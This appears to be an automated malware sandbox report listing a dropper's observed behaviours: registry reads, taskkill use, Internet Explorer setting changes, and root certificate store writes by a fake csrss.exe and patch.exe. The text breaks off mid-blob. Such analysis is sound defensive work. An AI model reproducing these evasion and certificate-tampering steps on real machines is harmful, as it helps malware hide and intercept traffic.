Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-24C2L.tmp\Mon16737798ac26f984.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon166dc6040fb8726.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16b7581baf7.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\rss\csrss.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16737798ac26f984.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon16e127a54386dd68.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-382 = "South Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1042 = "Ulaanbaatar Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-101 = "Provides Network Access Protection enforcement for EAP authenticated network connections, such as those used with 802.1X and VPN technologies." C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-911 = "Mauritius Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\eapqec.dll,-103 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-651 = "AUS Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-731 = "Fiji Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\tsgqec.dll,-102 = "1.0" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-131 = "US Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-3 = "Microsoft Corporation" C:\Windows\system32\netsh.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-592 = "Malay Peninsula Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-192 = "Mountain Standard Time" C:\Users\Admin\AppData\Local\Temp\7zS47BF0566\Mon167f9db638e4.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f